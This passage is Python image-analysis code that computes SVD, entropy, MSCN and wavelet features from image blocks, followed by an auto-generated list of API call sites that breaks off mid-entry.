data.append(np.std(diff_mean_list_3))
data.append(np.std(diff_std_list_5))
data.append(np.std(diff_mean_list_5))
data.append(np.std(plane_std_list_3))
data.append(np.std(plane_mean_list_3))
data.append(np.std(plane_std_list_5))
data.append(np.std(plane_mean_list_5))
data.append(np.std(plane_max_std_list_3))
data.append(np.std(plane_max_mean_list_3))
data.append(np.std(plane_max_std_list_5))
data.append(np.std(plane_max_mean_list_5))
if 'mean_normed' in data_type:
data.append(np.mean(diff_std_list_3))
data.append(np.mean(diff_mean_list_3))
data.append(np.mean(diff_std_list_5))
data.append(np.mean(diff_mean_list_5))
data.append(np.mean(plane_std_list_3))
data.append(np.mean(plane_mean_list_3))
data.append(np.mean(plane_std_list_5))
data.append(np.mean(plane_mean_list_5))
data.append(np.mean(plane_max_std_list_3))
data.append(np.mean(plane_max_mean_list_3))
data.append(np.mean(plane_max_std_list_5))
data.append(np.mean(plane_max_mean_list_5))
data = np.array(data)
if data_type == 'convolutional_kernel_stats_svd':
l_img = transform.get_LAB_L(block)
normed_l_img = utils.normalize_2D_arr(l_img)
# bilateral with window of size (5, 5)
normed_diff = convolution.convolution2D(normed_l_img, kernels.min_bilateral_diff, (5, 5))
# getting sigma vector from SVD compression
s = compression.get_SVD_s(normed_diff)
data = s
if data_type == 'svd_entropy':
l_img = transform.get_LAB_L(block)
blocks = segmentation.divide_in_blocks(l_img, (20, 20))
values = []
for b in blocks:
sv = compression.get_SVD_s(b)
values.append(utils.get_entropy(sv))
data = np.array(values)
if data_type == 'svd_entropy_20':
l_img = transform.get_LAB_L(block)
blocks = segmentation.divide_in_blocks(l_img, (20, 20))
values = []
for b in blocks:
sv = compression.get_SVD_s(b)
values.append(utils.get_entropy(sv))
data = np.array(values)
if data_type == 'svd_entropy_noise_20':
l_img = transform.get_LAB_L(block)
blocks = segmentation.divide_in_blocks(l_img, (20, 20))
values = []
for b in blocks:
sv = compression.get_SVD_s(b)
sv_size = len(sv)
values.append(utils.get_entropy(sv[int(sv_size / 4):]))
data = np.array(values)
return data
def w2d(arr, mode='haar', level=1):
    """Return the wavelet detail-only reconstruction of a 2D array.

    The input is scaled to [0, 1], decomposed with a 2D discrete wavelet
    transform, the approximation (low-frequency) coefficients are zeroed,
    and the detail-only reconstruction is rescaled back to uint8 range.

    Args:
        arr: 2D numeric array, expected in the 0..255 range.
        mode: wavelet name forwarded to pywt (e.g. 'haar').
            NOTE(review): despite its name this is passed as the *wavelet*
            argument of ``wavedec2``/``waverec2``, not the signal-extension
            mode; the name is kept for interface compatibility.
        level: decomposition level for the wavelet transform.

    Returns:
        np.uint8 2D array containing only the detail (high-frequency) part.
    """
    # Bug fix: the original `np.divide(imArray, 255)` discarded its result
    # (numpy division is not in-place), so the image was never normalized
    # before decomposition even though the final `*= 255` rescale assumes
    # it was. Assign the quotient so the normalization actually happens.
    imArray = np.divide(arr, 255)
    # compute wavelet coefficients
    coeffs = pywt.wavedec2(imArray, mode, level=level)
    # zero out the approximation coefficients, keeping only the details
    coeffs_H = list(coeffs)
    coeffs_H[0] *= 0
    # reconstruct from the detail coefficients alone
    imArray_H = pywt.waverec2(coeffs_H, mode)
    imArray_H *= 255
    imArray_H = np.uint8(imArray_H)
    return imArray_H
def _get_mscn_variance(block, sub_block_size=(50, 50)):
    """Return the sorted per-sub-block variances of MSCN coefficients.

    The block is split into sub-blocks of ``sub_block_size``; for each one
    the MSCN (mean-subtracted contrast-normalized) coefficients are computed
    and their variance taken. Variances are returned in ascending order.

    Args:
        block: 2D image region to analyse.
        sub_block_size: (width, height) of each sub-block.

    Returns:
        Sorted numpy array of one variance value per sub-block.
    """
    sub_blocks = segmentation.divide_in_blocks(block, sub_block_size)
    # one variance per sub-block, taken over the flattened MSCN coefficients
    variances = [
        np.var(transform.get_mscn_coefficients(sub).flatten())
        for sub in sub_blocks
    ]
    return np.sort(variances)
| [
"numpy.uint8",
"sys.path.insert",
"ipfml.utils.get_entropy_contribution_of_i",
"ipfml.utils.normalize_2D_arr",
"ipfml.utils.get_indices_of_lowest_values",
"cv2.filter2D",
"numpy.array",
"sklearn.decomposition.FastICA",
"pywt.waverec2",
"ipfml.processing.transform.rgb_to_mscn",
"numpy.divide",
... | [((538, 560), 'sys.path.insert', 'sys.path.insert', (['(0)', '""""""'], {}), "(0, '')\n", (553, 560), False, 'import sys\n'), ((23763, 23786), 'numpy.divide', 'np.divide', (['imArray', '(255)'], {}), '(imArray, 255)\n', (23772, 23786), True, 'import numpy as np\n'), ((23827, 23868), 'pywt.wavedec2', 'pywt.wavedec2', (['imArray', 'mode'], {'level': 'level'}), '(imArray, mode, level=level)\n', (23840, 23868), False, 'import pywt\n'), ((23983, 24012), 'pywt.waverec2', 'pywt.waverec2', (['coeffs_H', 'mode'], {}), '(coeffs_H, mode)\n', (23996, 24012), False, 'import pywt\n'), ((24050, 24069), 'numpy.uint8', 'np.uint8', (['imArray_H'], {}), '(imArray_H)\n', (24058, 24069), True, 'import numpy as np\n'), ((24163, 24215), 'ipfml.processing.segmentation.divide_in_blocks', 'segmentation.divide_in_blocks', (['block', 'sub_block_size'], {}), '(block, sub_block_size)\n', (24192, 24215), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((24425, 24438), 'numpy.sort', 'np.sort', (['data'], {}), '(data)\n', (24432, 24438), True, 'import numpy as np\n'), ((1021, 1049), 'ipfml.processing.transform.rgb_to_mscn', 'transform.rgb_to_mscn', (['block'], {}), '(block)\n', (1042, 1049), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((1290, 1326), 'PIL.Image.open', 'Image.open', (['mscn_revisited_file_path'], {}), '(mscn_revisited_file_path)\n', (1300, 1326), False, 'from PIL import Image\n'), ((1377, 1409), 'ipfml.processing.compression.get_SVD_s', 'compression.get_SVD_s', (['img_block'], {}), '(img_block)\n', (1398, 1409), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((1830, 1871), 'ipfml.processing.transform.rgb_to_LAB_L_low_bits', 'transform.rgb_to_LAB_L_low_bits', (['block', '(6)'], {}), '(block, 6)\n', (1861, 1871), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((1887, 1920), 'ipfml.processing.compression.get_SVD_s', 'compression.get_SVD_s', 
(['low_bits_6'], {}), '(low_bits_6)\n', (1908, 1920), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((1978, 2019), 'ipfml.processing.transform.rgb_to_LAB_L_low_bits', 'transform.rgb_to_LAB_L_low_bits', (['block', '(5)'], {}), '(block, 5)\n', (2009, 2019), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((2035, 2068), 'ipfml.processing.compression.get_SVD_s', 'compression.get_SVD_s', (['low_bits_5'], {}), '(low_bits_5)\n', (2056, 2068), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((2126, 2167), 'ipfml.processing.transform.rgb_to_LAB_L_low_bits', 'transform.rgb_to_LAB_L_low_bits', (['block', '(4)'], {}), '(block, 4)\n', (2157, 2167), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((2183, 2216), 'ipfml.processing.compression.get_SVD_s', 'compression.get_SVD_s', (['low_bits_4'], {}), '(low_bits_4)\n', (2204, 2216), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((2274, 2315), 'ipfml.processing.transform.rgb_to_LAB_L_low_bits', 'transform.rgb_to_LAB_L_low_bits', (['block', '(3)'], {}), '(block, 3)\n', (2305, 2315), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((2331, 2364), 'ipfml.processing.compression.get_SVD_s', 'compression.get_SVD_s', (['low_bits_3'], {}), '(low_bits_3)\n', (2352, 2364), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((2422, 2463), 'ipfml.processing.transform.rgb_to_LAB_L_low_bits', 'transform.rgb_to_LAB_L_low_bits', (['block', '(2)'], {}), '(block, 2)\n', (2453, 2463), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((2479, 2512), 'ipfml.processing.compression.get_SVD_s', 'compression.get_SVD_s', (['low_bits_2'], {}), '(low_bits_2)\n', (2500, 2512), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((2698, 2715), 'numpy.asarray', 'np.asarray', (['block'], {}), 
'(block)\n', (2708, 2715), True, 'import numpy as np\n'), ((2840, 2901), 'ipfml.processing.segmentation.divide_in_blocks', 'segmentation.divide_in_blocks', (['block', '(sub_width, sub_height)'], {}), '(block, (sub_width, sub_height))\n', (2869, 2901), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((3566, 3582), 'numpy.asarray', 'np.asarray', (['data'], {}), '(data)\n', (3576, 3582), True, 'import numpy as np\n'), ((3649, 3666), 'numpy.asarray', 'np.asarray', (['block'], {}), '(block)\n', (3659, 3666), True, 'import numpy as np\n'), ((3791, 3852), 'ipfml.processing.segmentation.divide_in_blocks', 'segmentation.divide_in_blocks', (['block', '(sub_width, sub_height)'], {}), '(block, (sub_width, sub_height))\n', (3820, 3852), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((4397, 4413), 'numpy.asarray', 'np.asarray', (['data'], {}), '(data)\n', (4407, 4413), True, 'import numpy as np\n'), ((4471, 4488), 'numpy.asarray', 'np.asarray', (['block'], {}), '(block)\n', (4481, 4488), True, 'import numpy as np\n'), ((4613, 4674), 'ipfml.processing.segmentation.divide_in_blocks', 'segmentation.divide_in_blocks', (['block', '(sub_width, sub_height)'], {}), '(block, (sub_width, sub_height))\n', (4642, 4674), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((5044, 5060), 'numpy.asarray', 'np.asarray', (['data'], {}), '(data)\n', (5054, 5060), True, 'import numpy as np\n'), ((5125, 5142), 'numpy.asarray', 'np.asarray', (['block'], {}), '(block)\n', (5135, 5142), True, 'import numpy as np\n'), ((5267, 5328), 'ipfml.processing.segmentation.divide_in_blocks', 'segmentation.divide_in_blocks', (['block', '(sub_width, sub_height)'], {}), '(block, (sub_width, sub_height))\n', (5296, 5328), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((5755, 5771), 'numpy.asarray', 'np.asarray', (['data'], {}), '(data)\n', (5765, 5771), True, 'import numpy as np\n'), ((6144, 
6160), 'numpy.asarray', 'np.asarray', (['data'], {}), '(data)\n', (6154, 6160), True, 'import numpy as np\n'), ((6378, 6394), 'numpy.asarray', 'np.asarray', (['data'], {}), '(data)\n', (6388, 6394), True, 'import numpy as np\n'), ((6562, 6588), 'ipfml.processing.transform.get_LAB_L', 'transform.get_LAB_L', (['block'], {}), '(block)\n', (6581, 6588), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((6604, 6628), 'sklearn.decomposition.FastICA', 'FastICA', ([], {'n_components': '(50)'}), '(n_components=50)\n', (6611, 6628), False, 'from sklearn.decomposition import FastICA\n'), ((6795, 6833), 'ipfml.utils.normalize_2D_arr', 'utils.normalize_2D_arr', (['image_restored'], {}), '(image_restored)\n', (6817, 6833), False, 'from ipfml import utils\n'), ((6856, 6892), 'numpy.array', 'np.array', (['(final_image * 255)', '"""uint8"""'], {}), "(final_image * 255, 'uint8')\n", (6864, 6892), True, 'import numpy as np\n'), ((7183, 7209), 'ipfml.processing.transform.get_LAB_L', 'transform.get_LAB_L', (['block'], {}), '(block)\n', (7202, 7209), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((7225, 7283), 'sklearn.decomposition.TruncatedSVD', 'TruncatedSVD', ([], {'n_components': '(30)', 'n_iter': '(100)', 'random_state': '(42)'}), '(n_components=30, n_iter=100, random_state=42)\n', (7237, 7283), False, 'from sklearn.decomposition import TruncatedSVD\n'), ((7488, 7522), 'ipfml.processing.compression.get_SVD', 'compression.get_SVD', (['reduced_image'], {}), '(reduced_image)\n', (7507, 7522), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((7599, 7625), 'ipfml.processing.transform.get_LAB_L', 'transform.get_LAB_L', (['block'], {}), '(block)\n', (7618, 7625), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((7649, 7695), 'sklearn.decomposition.IncrementalPCA', 'IncrementalPCA', ([], {'n_components': '(20)', 'batch_size': '(25)'}), '(n_components=20, 
batch_size=25)\n', (7663, 7695), False, 'from sklearn.decomposition import IncrementalPCA\n'), ((7916, 7950), 'ipfml.processing.compression.get_SVD', 'compression.get_SVD', (['reduced_image'], {}), '(reduced_image)\n', (7935, 7950), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((8115, 8141), 'ipfml.processing.transform.get_LAB_L', 'transform.get_LAB_L', (['block'], {}), '(block)\n', (8134, 8141), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((8160, 8186), 'numpy.array', 'np.array', (['lab_img', '"""uint8"""'], {}), "(lab_img, 'uint8')\n", (8168, 8186), True, 'import numpy as np\n'), ((8206, 8242), 'numpy.linalg.svd', 'lin_svd', (['lab_img'], {'full_matrices': '(True)'}), '(lab_img, full_matrices=True)\n', (8213, 8242), True, 'from numpy.linalg import svd as lin_svd\n'), ((8259, 8310), 'numpy.zeros', 'np.zeros', (['(end - begin, end - begin)'], {'dtype': 'complex'}), '((end - begin, end - begin), dtype=complex)\n', (8267, 8310), True, 'import numpy as np\n'), ((8328, 8349), 'numpy.diag', 'np.diag', (['s[begin:end]'], {}), '(s[begin:end])\n', (8335, 8349), True, 'import numpy as np\n'), ((8449, 8478), 'numpy.array', 'np.array', (['output_img', '"""uint8"""'], {}), "(output_img, 'uint8')\n", (8457, 8478), True, 'import numpy as np\n'), ((8495, 8528), 'ipfml.processing.compression.get_SVD_s', 'compression.get_SVD_s', (['output_img'], {}), '(output_img)\n', (8516, 8528), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((8642, 8668), 'ipfml.processing.transform.get_LAB_L', 'transform.get_LAB_L', (['block'], {}), '(block)\n', (8661, 8668), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((8683, 8700), 'numpy.array', 'np.array', (['lab_img'], {}), '(lab_img)\n', (8691, 8700), True, 'import numpy as np\n'), ((9027, 9053), 'ipfml.processing.compression.get_SVD_s', 'compression.get_SVD_s', (['arr'], {}), '(arr)\n', (9048, 9053), False, 'from 
ipfml.processing import transform, compression, segmentation\n'), ((9268, 9287), 'numpy.array', 'np.array', (['sv_vector'], {}), '(sv_vector)\n', (9276, 9287), True, 'import numpy as np\n'), ((10083, 10109), 'ipfml.processing.transform.get_LAB_L', 'transform.get_LAB_L', (['block'], {}), '(block)\n', (10102, 10109), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((10124, 10141), 'numpy.array', 'np.array', (['lab_img'], {}), '(lab_img)\n', (10132, 10141), True, 'import numpy as np\n'), ((10336, 10362), 'ipfml.processing.compression.get_SVD_s', 'compression.get_SVD_s', (['arr'], {}), '(arr)\n', (10357, 10362), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((10577, 10596), 'numpy.array', 'np.array', (['sv_vector'], {}), '(sv_vector)\n', (10585, 10596), True, 'import numpy as np\n'), ((11392, 11418), 'ipfml.processing.transform.get_LAB_L', 'transform.get_LAB_L', (['block'], {}), '(block)\n', (11411, 11418), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((11433, 11450), 'numpy.array', 'np.array', (['lab_img'], {}), '(lab_img)\n', (11441, 11450), True, 'import numpy as np\n'), ((12409, 12435), 'ipfml.processing.compression.get_SVD_s', 'compression.get_SVD_s', (['arr'], {}), '(arr)\n', (12430, 12435), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((12650, 12669), 'numpy.array', 'np.array', (['sv_vector'], {}), '(sv_vector)\n', (12658, 12669), True, 'import numpy as np\n'), ((13383, 13409), 'ipfml.processing.transform.get_LAB_L', 'transform.get_LAB_L', (['block'], {}), '(block)\n', (13402, 13409), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((13424, 13441), 'numpy.array', 'np.array', (['lab_img'], {}), '(lab_img)\n', (13432, 13441), True, 'import numpy as np\n'), ((14697, 14716), 'numpy.array', 'np.array', (['sv_vector'], {}), '(sv_vector)\n', (14705, 14716), True, 'import numpy as np\n'), ((15312, 15338), 
'ipfml.processing.compression.get_SVD_s', 'compression.get_SVD_s', (['arr'], {}), '(arr)\n', (15333, 15338), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((15436, 15482), 'ipfml.processing.segmentation.divide_in_blocks', 'segmentation.divide_in_blocks', (['block', '(20, 20)'], {}), '(block, (20, 20))\n', (15465, 15482), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((18233, 18258), 'numpy.array', 'np.array', (['diff_std_list_3'], {}), '(diff_std_list_3)\n', (18241, 18258), True, 'import numpy as np\n'), ((18285, 18310), 'numpy.array', 'np.array', (['diff_std_list_5'], {}), '(diff_std_list_5)\n', (18293, 18310), True, 'import numpy as np\n'), ((18339, 18365), 'numpy.array', 'np.array', (['diff_mean_list_3'], {}), '(diff_mean_list_3)\n', (18347, 18365), True, 'import numpy as np\n'), ((18393, 18419), 'numpy.array', 'np.array', (['diff_mean_list_5'], {}), '(diff_mean_list_5)\n', (18401, 18419), True, 'import numpy as np\n'), ((18448, 18474), 'numpy.array', 'np.array', (['plane_std_list_3'], {}), '(plane_std_list_3)\n', (18456, 18474), True, 'import numpy as np\n'), ((18502, 18528), 'numpy.array', 'np.array', (['plane_std_list_5'], {}), '(plane_std_list_5)\n', (18510, 18528), True, 'import numpy as np\n'), ((18558, 18585), 'numpy.array', 'np.array', (['plane_mean_list_3'], {}), '(plane_mean_list_3)\n', (18566, 18585), True, 'import numpy as np\n'), ((18614, 18641), 'numpy.array', 'np.array', (['plane_mean_list_5'], {}), '(plane_mean_list_5)\n', (18622, 18641), True, 'import numpy as np\n'), ((18674, 18704), 'numpy.array', 'np.array', (['plane_max_std_list_3'], {}), '(plane_max_std_list_3)\n', (18682, 18704), True, 'import numpy as np\n'), ((18736, 18766), 'numpy.array', 'np.array', (['plane_max_std_list_5'], {}), '(plane_max_std_list_5)\n', (18744, 18766), True, 'import numpy as np\n'), ((18800, 18831), 'numpy.array', 'np.array', (['plane_max_mean_list_3'], {}), '(plane_max_mean_list_3)\n', (18808, 
18831), True, 'import numpy as np\n'), ((18864, 18895), 'numpy.array', 'np.array', (['plane_max_mean_list_5'], {}), '(plane_max_mean_list_5)\n', (18872, 18895), True, 'import numpy as np\n'), ((22222, 22236), 'numpy.array', 'np.array', (['data'], {}), '(data)\n', (22230, 22236), True, 'import numpy as np\n'), ((22309, 22335), 'ipfml.processing.transform.get_LAB_L', 'transform.get_LAB_L', (['block'], {}), '(block)\n', (22328, 22335), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((22359, 22388), 'ipfml.utils.normalize_2D_arr', 'utils.normalize_2D_arr', (['l_img'], {}), '(l_img)\n', (22381, 22388), False, 'from ipfml import utils\n'), ((22459, 22534), 'ipfml.filters.convolution.convolution2D', 'convolution.convolution2D', (['normed_l_img', 'kernels.min_bilateral_diff', '(5, 5)'], {}), '(normed_l_img, kernels.min_bilateral_diff, (5, 5))\n', (22484, 22534), False, 'from ipfml.filters import convolution, kernels\n'), ((22600, 22634), 'ipfml.processing.compression.get_SVD_s', 'compression.get_SVD_s', (['normed_diff'], {}), '(normed_diff)\n', (22621, 22634), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((22705, 22731), 'ipfml.processing.transform.get_LAB_L', 'transform.get_LAB_L', (['block'], {}), '(block)\n', (22724, 22731), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((22750, 22796), 'ipfml.processing.segmentation.divide_in_blocks', 'segmentation.divide_in_blocks', (['l_img', '(20, 20)'], {}), '(l_img, (20, 20))\n', (22779, 22796), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((22949, 22965), 'numpy.array', 'np.array', (['values'], {}), '(values)\n', (22957, 22965), True, 'import numpy as np\n'), ((23021, 23047), 'ipfml.processing.transform.get_LAB_L', 'transform.get_LAB_L', (['block'], {}), '(block)\n', (23040, 23047), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((23066, 23112), 
'ipfml.processing.segmentation.divide_in_blocks', 'segmentation.divide_in_blocks', (['l_img', '(20, 20)'], {}), '(l_img, (20, 20))\n', (23095, 23112), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((23265, 23281), 'numpy.array', 'np.array', (['values'], {}), '(values)\n', (23273, 23281), True, 'import numpy as np\n'), ((23343, 23369), 'ipfml.processing.transform.get_LAB_L', 'transform.get_LAB_L', (['block'], {}), '(block)\n', (23362, 23369), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((23388, 23434), 'ipfml.processing.segmentation.divide_in_blocks', 'segmentation.divide_in_blocks', (['l_img', '(20, 20)'], {}), '(l_img, (20, 20))\n', (23417, 23434), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((23636, 23652), 'numpy.array', 'np.array', (['values'], {}), '(values)\n', (23644, 23652), True, 'import numpy as np\n'), ((24285, 24323), 'ipfml.processing.transform.get_mscn_coefficients', 'transform.get_mscn_coefficients', (['block'], {}), '(block)\n', (24316, 24323), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((933, 960), 'PIL.Image.open', 'Image.open', (['block_file_path'], {}), '(block_file_path)\n', (943, 960), False, 'from PIL import Image\n'), ((2596, 2638), 'ipfml.processing.transform.rgb_to_LAB_L_bits', 'transform.rgb_to_LAB_L_bits', (['block', '(3, 6)'], {}), '(block, (3, 6))\n', (2623, 2638), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((3401, 3446), 'ipfml.utils.integral_area_trapz', 'utils.integral_area_trapz', (['l_svd_data'], {'dx': '(100)'}), '(l_svd_data, dx=100)\n', (3426, 3446), False, 'from ipfml import utils\n'), ((4880, 4924), 'ipfml.utils.integral_area_trapz', 'utils.integral_area_trapz', (['l_svd_data'], {'dx': '(50)'}), '(l_svd_data, dx=50)\n', (4905, 4924), False, 'from ipfml import utils\n'), ((5527, 5558), 'ipfml.utils.normalize_arr', 'utils.normalize_arr', (['l_svd_data'], 
{}), '(l_svd_data)\n', (5546, 5558), False, 'from ipfml import utils\n'), ((5591, 5635), 'ipfml.utils.integral_area_trapz', 'utils.integral_area_trapz', (['l_svd_data'], {'dx': '(50)'}), '(l_svd_data, dx=50)\n', (5616, 5635), False, 'from ipfml import utils\n'), ((6934, 6970), 'ipfml.processing.compression.get_SVD_s', 'compression.get_SVD_s', (['current_image'], {}), '(current_image)\n', (6955, 6970), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((7016, 7050), 'ipfml.processing.compression.get_SVD_s', 'compression.get_SVD_s', (['final_image'], {}), '(final_image)\n', (7037, 7050), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((8396, 8425), 'numpy.dot', 'np.dot', (['smat', 'V[begin:end, :]'], {}), '(smat, V[begin:end, :])\n', (8402, 8425), True, 'import numpy as np\n'), ((8790, 8812), 'scipy.signal.medfilt2d', 'medfilt2d', (['arr', '[3, 3]'], {}), '(arr, [3, 3])\n', (8799, 8812), False, 'from scipy.signal import medfilt2d, wiener, cwt\n'), ((8836, 8858), 'scipy.signal.medfilt2d', 'medfilt2d', (['arr', '[5, 5]'], {}), '(arr, [5, 5])\n', (8845, 8858), False, 'from scipy.signal import medfilt2d, wiener, cwt\n'), ((8882, 8901), 'scipy.signal.wiener', 'wiener', (['arr', '[3, 3]'], {}), '(arr, [3, 3])\n', (8888, 8901), False, 'from scipy.signal import medfilt2d, wiener, cwt\n'), ((8925, 8944), 'scipy.signal.wiener', 'wiener', (['arr', '[5, 5]'], {}), '(arr, [5, 5])\n', (8931, 8944), False, 'from scipy.signal import medfilt2d, wiener, cwt\n'), ((9177, 9203), 'ipfml.processing.compression.get_SVD_s', 'compression.get_SVD_s', (['img'], {}), '(img)\n', (9198, 9203), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((9519, 9554), 'ipfml.utils.normalize_arr', 'utils.normalize_arr', (['sv_array[:, i]'], {}), '(sv_array[:, i])\n', (9538, 9554), False, 'from ipfml import utils\n'), ((9692, 9739), 'ipfml.utils.get_indices_of_lowest_values', 'utils.get_indices_of_lowest_values', 
(['sv_std', '(200)'], {}), '(sv_std, 200)\n', (9726, 9739), False, 'from ipfml import utils\n'), ((9798, 9846), 'ipfml.utils.get_indices_of_highest_values', 'utils.get_indices_of_highest_values', (['sv_std', '(200)'], {}), '(sv_std, 200)\n', (9833, 9846), False, 'from ipfml import utils\n'), ((10231, 10253), 'scipy.signal.medfilt2d', 'medfilt2d', (['arr', '[3, 3]'], {}), '(arr, [3, 3])\n', (10240, 10253), False, 'from scipy.signal import medfilt2d, wiener, cwt\n'), ((10486, 10512), 'ipfml.processing.compression.get_SVD_s', 'compression.get_SVD_s', (['img'], {}), '(img)\n', (10507, 10512), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((10828, 10863), 'ipfml.utils.normalize_arr', 'utils.normalize_arr', (['sv_array[:, i]'], {}), '(sv_array[:, i])\n', (10847, 10863), False, 'from ipfml import utils\n'), ((11001, 11048), 'ipfml.utils.get_indices_of_lowest_values', 'utils.get_indices_of_lowest_values', (['sv_std', '(200)'], {}), '(sv_std, 200)\n', (11035, 11048), False, 'from ipfml import utils\n'), ((11107, 11155), 'ipfml.utils.get_indices_of_highest_values', 'utils.get_indices_of_highest_values', (['sv_std', '(200)'], {}), '(sv_std, 200)\n', (11142, 11155), False, 'from ipfml import utils\n'), ((11535, 11562), 'numpy.ones', 'np.ones', (['(3, 3)', 'np.float32'], {}), '((3, 3), np.float32)\n', (11542, 11562), True, 'import numpy as np\n'), ((11585, 11614), 'cv2.filter2D', 'cv2.filter2D', (['arr', '(-1)', 'kernel'], {}), '(arr, -1, kernel)\n', (11597, 11614), False, 'import cv2\n'), ((11632, 11659), 'numpy.ones', 'np.ones', (['(5, 5)', 'np.float32'], {}), '((5, 5), np.float32)\n', (11639, 11659), True, 'import numpy as np\n'), ((11683, 11712), 'cv2.filter2D', 'cv2.filter2D', (['arr', '(-1)', 'kernel'], {}), '(arr, -1, kernel)\n', (11695, 11712), False, 'import cv2\n'), ((11735, 11769), 'cv2.GaussianBlur', 'cv2.GaussianBlur', (['arr', '(3, 3)', '(0.5)'], {}), '(arr, (3, 3), 0.5)\n', (11751, 11769), False, 'import cv2\n'), ((11794, 11826), 
'cv2.GaussianBlur', 'cv2.GaussianBlur', (['arr', '(3, 3)', '(1)'], {}), '(arr, (3, 3), 1)\n', (11810, 11826), False, 'import cv2\n'), ((11851, 11885), 'cv2.GaussianBlur', 'cv2.GaussianBlur', (['arr', '(3, 3)', '(1.5)'], {}), '(arr, (3, 3), 1.5)\n', (11867, 11885), False, 'import cv2\n'), ((11910, 11944), 'cv2.GaussianBlur', 'cv2.GaussianBlur', (['arr', '(5, 5)', '(0.5)'], {}), '(arr, (5, 5), 0.5)\n', (11926, 11944), False, 'import cv2\n'), ((11969, 12001), 'cv2.GaussianBlur', 'cv2.GaussianBlur', (['arr', '(5, 5)', '(1)'], {}), '(arr, (5, 5), 1)\n', (11985, 12001), False, 'import cv2\n'), ((12026, 12060), 'cv2.GaussianBlur', 'cv2.GaussianBlur', (['arr', '(5, 5)', '(1.5)'], {}), '(arr, (5, 5), 1.5)\n', (12042, 12060), False, 'import cv2\n'), ((12085, 12107), 'scipy.signal.medfilt2d', 'medfilt2d', (['arr', '[3, 3]'], {}), '(arr, [3, 3])\n', (12094, 12107), False, 'from scipy.signal import medfilt2d, wiener, cwt\n'), ((12132, 12154), 'scipy.signal.medfilt2d', 'medfilt2d', (['arr', '[5, 5]'], {}), '(arr, [5, 5])\n', (12141, 12154), False, 'from scipy.signal import medfilt2d, wiener, cwt\n'), ((12179, 12198), 'scipy.signal.wiener', 'wiener', (['arr', '[3, 3]'], {}), '(arr, [3, 3])\n', (12185, 12198), False, 'from scipy.signal import medfilt2d, wiener, cwt\n'), ((12223, 12242), 'scipy.signal.wiener', 'wiener', (['arr', '[5, 5]'], {}), '(arr, [5, 5])\n', (12229, 12242), False, 'from scipy.signal import medfilt2d, wiener, cwt\n'), ((12301, 12326), 'numpy.array', 'np.array', (['wave', '"""float64"""'], {}), "(wave, 'float64')\n", (12309, 12326), True, 'import numpy as np\n'), ((12559, 12585), 'ipfml.processing.compression.get_SVD_s', 'compression.get_SVD_s', (['img'], {}), '(img)\n', (12580, 12585), False, 'from ipfml.processing import transform, compression, segmentation\n'), ((12901, 12936), 'ipfml.utils.normalize_arr', 'utils.normalize_arr', (['sv_array[:, i]'], {}), '(sv_array[:, i])\n', (12920, 12936), False, 'from ipfml import utils\n'), ((13074, 13121), 
'ipfml.utils.get_indices_of_lowest_values', 'utils.get_indices_of_lowest_values', (['sv_std', '(200)'], {}), '(sv_std, 200)\n', (13108, 13121), False, 'from ipfml import utils\n'), ((13180, 13228), 'ipfml.utils.get_indices_of_highest_values', 'utils.get_indices_of_highest_values', (['sv_std', '(200)'], {}), '(sv_std, 200)\n', (13215, 13228), False, 'from ipfml import utils\n'), ((13481, 13508), 'numpy.ones', 'np.ones', (['(3, 3)', 'np.float32'], {}), '((3, 3), np.float32)\n', (13488, 13508), True, 'import numpy as np\n'), ((13531, 13560), 'cv2.filter2D', 'cv2.filter2D', (['arr', '(-1)', 'kernel'], {}), '(arr, -1, kernel)\n', (13543, 13560), False, 'import cv2\n'), ((13578, 13605), 'numpy.ones', 'np.ones', (['(5, 5)', 'np.float32'], {}), '((5, 5), np.float32)\n', (13585, 13605), True, 'import numpy as np\n'), ((13629, 13658), 'cv2.filter2D', 'cv2.filter2D', (['arr', '(-1)', 'kernel'], {}), '(arr, -1, kernel)\n', (13641, 13658), False, 'import cv2\n'), ((13681, 13715), 'cv2.GaussianBlur', 'cv2.GaussianBlur', (['arr', '(3, 3)', '(0.5)'], {}), '(arr, (3, 3), 0.5)\n', (13697, 13715), False, 'import cv2\n'), ((13740, 13772), 'cv2.GaussianBlur', 'cv2.GaussianBlur', (['arr', '(3, 3)', 